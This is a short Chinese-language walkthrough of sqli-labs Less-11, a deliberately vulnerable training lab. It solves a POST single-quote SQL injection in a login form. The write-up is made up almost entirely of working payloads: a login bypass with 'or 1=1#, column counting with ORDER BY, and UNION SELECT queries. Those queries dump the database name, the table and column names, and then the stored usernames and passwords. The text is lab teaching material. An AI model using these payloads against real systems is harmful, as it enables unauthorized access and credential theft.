phpstudy-sqlilabs-less-11

题目：POST - Error Based - Single quotes- String

基于错误的单引号post型字符变形的注入

看到有个账密输入口第一反应尝试post注入

打开post data

在post data 里输入 uname=pppp 'or 1=1#&passwd=1&submit=Submit

尝试单引号闭合，Execute 为输入按钮

弹出蓝字表示成功进入

查字段

uname=pppp 'or 1=1 order by 3#&passwd=1&submit=Submit

uname=pppp 'or 1=1 order by 2#&passwd=1&submit=Submit

有两个字段

查可显示字段

uname=pppp 'and 1=1 union select 1,2#&passwd=1&submit=Submit

12均可显示

查数据库名与版本

uname=pppp 'and 1=1 union select database(),version()#&passwd=1&submit=Submit

库名：security

版本：5.7.26

查表名

uname=pppp 'and 1=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=1&submit=Submit

表名：emails,referers,uagents,users

查列名

uname=pppp 'and 1=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=1&submit=Submit

列名：USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,level,id,username,password

查账密

uname=pppp 'and 1=1 union select username,password from users limit 0,1#&passwd=1&submit=Submit

uname=pppp 'and 1=1 union select username,password from users limit 1,1#&passwd=1&submit=Submit

依次类推，可以查到所有账密